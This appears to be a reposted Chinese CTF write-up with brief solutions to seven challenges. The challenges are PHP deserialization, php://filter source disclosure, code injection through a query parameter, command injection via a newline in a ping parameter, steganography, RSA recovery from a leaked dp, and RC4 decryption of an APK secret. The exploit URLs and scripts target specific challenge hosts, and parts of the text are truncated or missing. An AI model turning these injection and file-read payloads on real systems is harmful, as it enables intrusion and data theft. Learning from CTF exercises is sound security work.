本文共 8312 字，大约阅读时间需要 27 分钟。

1.nani

构造payload，拿到user.php源码：http://120.55.43.255:24719/?file=php://filter/read=convert.base64-encode/resource=./user.php

   warn);	}	function __wakeup(){		foreach(get_object_vars($this) as $k => $v) {			$this->$k = null;		}	}}$cmd = $_POST[cmd];unserialize($cmd);?>

很明显，是一个反序列化的题，于是构造payload为：

2.XImg

用Stegsolve.jar打开图片，lsb查看可以拿到flag：

3.random

构造payload：http://120.55.43.255:27189/?seed=1555236291&key=895547922&hello=);print_r(file(%22./flag.php%22));//

4.rsa

import gmpy2e=65537n=444511907374811621333864968430251419855347882081695888904531795366857517417289716213363408137550866409163408633679685635315881237914815762134949770798439327373469286675370381115822381092997433491238495970527484356127131132345893007368069814286822931047915482947544230741924674880304607902413527794657556174021361113759962742306966643629644800759209829893438222447478882663573891473386520138017997195362559918730232709719486847337248425121547893862458228964360472119045154255446606447184782930767120924229261090464514045697735201016333117579385787597262783543886217220299959364476125167328883418109849139384318692440116746717156025869399990008034002881758452936213924306428955442475834311604905905260723607788504332389824348292286402781474054375184928462870240017012586229806658850881803134678565293180207556731290044948846308165695896369703720482941116135445836684836990286418102640883844706122407701782360072256987197118468391662366105964629786899281484884877640733549203394680006068637251717623691598753570260479050407069262236583726905151495550801274277155039839844872050380772537409714164680083539118124646217833871816488578092001365486400242215564766336041803413006183310354910820598373905617564797817421231716827155927723376783dp=20688083194401098183398626094352469308150523583583104270723199988926694776131531953207031668652408481119466919329893607763657623952024909876740067584191851505244658377465365020503008072292716279306615911408934182303357474341329766407852983275790499225322862499664901633190925232802162977135254216707834894816730529759991634343322039528413883937752397011466779521590767711786777317159161700645318091278528395252576086979838790917201179739657819356771788743301669430631157222234922010934163688512789947321007479617996170289230676037655762865962020063056831019134814970048718940037920888121806608032574204482673114726401c=378245912689862819668716257795108255336928883693984263805908702337591160408234974716356292413190786704878880742998101926728409825216339197208512929079484687018187263522243781958701468849915372674337274640196043362477406890622345686503512151501592397926764442945655423801602100185867239106836704835215686246083812117439685990637352246191517010645343417283169123105697782747026231044064639955374854873089604766677942725374108213749982052985866259433900255218180285975477045323647923881322428349632056484406017564586481848442834247385904402824072352354677823823078646874632195128328299942128116508251564811923564362991466660005438580449558184197006623490303413636461137434703925564785299335803341222051570131842042120923719184091689629809380828306649702440460761848154682611972768099340896995546188526274235118488618951865589050087434162728116205149188555273127955536588551565951618535230908129965250151258048934985977493740897420718340268536363763127676899114219828753570040978640121185354431884041597851910784347040946251752577201426797684912671641470307249794269755972278013107831885544781029384256069586713714201822683071958299038410102821213570933652719191413490563464823296852894960994148922867149263897530215474500564443133161527for x in range(1,e):	if (dp*e-1)%x == 0:		p = (dp*e-1)/x + 1		if n%p==0:			q = n / p			phi =(p - 1) * (q - 1)			d = int(gmpy2.invert(e,phi))			m = pow(c,d,n)			s = str(hex(m))[2:]			s = s[0:len(s)-1]			flag = s.decode('hex')			print flag			break

执行上述python代码可拿到flag。

5.admin

构造payload:

import requestsr = requests.post('http://120.55.43.255:28119/?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/convert.base64-encode/resource=fffffflag.php";}',data='admin').contentprint r

拿到一串base64，解码可得flag。

6.ping

构造payload:http://120.55.43.255:21173/ping.php?ip=127.0.0.1%0Als

7.apk123

反编译apk，可知是RC4加密算法，用java代码编写RC4算法，解密可得flag.

import java.io.UnsupportedEncodingException;public class RC4Util {    /**     * RC4加密，将加密后的数据进行哈希     * @param data 需要加密的数据     * @param key 加密密钥     * @param chartSet 编码方式     * @return 返回加密后的数据     * @throws UnsupportedEncodingException     */    public static String encryRC4String(String data, String key, String chartSet) throws UnsupportedEncodingException {        if (data == null || key == null) {            return null;        }        return bytesToHex(encryRC4Byte(data, key, chartSet));    }    /**     * RC4加密，将加密后的字节数据     * @param data 需要加密的数据     * @param key 加密密钥     * @param chartSet 编码方式     * @return 返回加密后的数据     * @throws UnsupportedEncodingException     */    public static byte[] encryRC4Byte(String data, String key, String chartSet) throws UnsupportedEncodingException {        if (data == null || key == null) {            return null;        }        if (chartSet == null || chartSet.isEmpty()) {            byte bData[] = data.getBytes();            return RC4Base(bData, key);        } else {            byte bData[] = data.getBytes(chartSet);            return RC4Base(bData, key);        }    }    /**     * RC4解密     * @param data 需要解密的数据     * @param key 加密密钥     * @param chartSet 编码方式     * @return 返回解密后的数据     * @throws UnsupportedEncodingException     */    public static String decryRC4(String data, String key,String chartSet) throws UnsupportedEncodingException {        if (data == null || key == null) {            return null;        }        return new String(RC4Base(hexToByte(data), key),chartSet);    }    /**     * RC4加密初始化密钥     * @param aKey     * @return     */    private static byte[] initKey(String aKey) {        byte[] bkey = aKey.getBytes();        byte state[] = new byte[256];        for (int i = 0; i < 256; i++) {            state[i] = (byte) i;        }        int index1 = 0;        int index2 = 0;        if (bkey.length == 0) {            return null;        }        for (int i = 0; i < 256; i++) {            index2 = ((bkey[index1] & 0xff) + (state[i] & 0xff) + index2) & 0xff;            byte tmp = state[i];            state[i] = state[index2];            state[index2] = tmp;            index1 = (index1 + 1) % bkey.length;        }        return state;    }    /**     * 字节数组转十六进制     * @param bytes     * @return     */    public static String bytesToHex(byte[] bytes) {        StringBuffer sb = new StringBuffer();        for(int i = 0; i < bytes.length; i++) {            String hex = Integer.toHexString(bytes[i] & 0xFF);            if(hex.length() < 2){                sb.append(0);            }            sb.append(hex);        }        return sb.toString();    }    /**     * 十六进制转字节数组     * @param src     * @return     */    public static byte[] hexToByte(String inHex){        int hexlen = inHex.length();        byte[] result;        if (hexlen % 2 == 1){            hexlen++;            result = new byte[(hexlen/2)];            inHex="0"+inHex;        }else {            result = new byte[(hexlen/2)];        }        int j=0;        for (int i = 0; i < hexlen; i+=2){            result[j]=(byte)Integer.parseInt(inHex.substring(i,i+2),16);            j++;        }        return result;    }    /**     * RC4解密     * @param input     * @param mKkey     * @return     */    private static byte[] RC4Base(byte[] input, String mKkey) {        int x = 0;        int y = 0;        byte key[] = initKey(mKkey);        int xorIndex;        byte[] result = new byte[input.length];        for (int i = 0; i < input.length; i++) {            x = (x + 1) & 0xff;            y = ((key[x] & 0xff) + y) & 0xff;            byte tmp = key[x];            key[x] = key[y];            key[y] = tmp;            xorIndex = ((key[x] & 0xff) + (key[y] & 0xff)) & 0xff;            result[i] = (byte) (input[i] ^ key[xorIndex]);        }        return result;    }    public static void main(String[] args) throws Exception{        System.out.println(decryRC4("52aedea36a3c058b38aa32e625889947db302a6d1defdabf413085abf611487bf445e85108327a867c27","Flag{This_Not_Flag}","UTF-8"));    }}

转载地址：https://lynnlovemin.blog.csdn.net/article/details/103734447 如侵犯您的版权，请留言回复原文章的地址，我们会给您删除此文章，给您带来不便请您谅解！